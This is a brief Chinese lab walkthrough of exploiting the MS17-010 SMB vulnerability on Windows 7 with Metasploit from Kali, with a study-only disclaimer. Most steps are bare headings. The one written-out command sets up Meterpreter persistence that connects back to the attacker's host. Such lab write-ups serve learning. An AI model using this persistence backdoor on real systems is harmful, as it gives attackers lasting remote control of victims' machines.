ms17-010漏洞

注:本文章只用于学习和交流使用，请各位读者切勿利用该漏洞做出出格的事情！！！

实验环境：

kali、win7

 

启动metasploit控制台调用ms17-010模块

 

 

设置目标ip

 

测试目标是否存在该漏洞

 

调用exploit模块设置目标ip

 

设置payload和本地ip开始执行

 

 

成功获取shell

 

维持权限
run persistence -U -i -p 4445 -r 本地ip    

ps 查看rscript.exe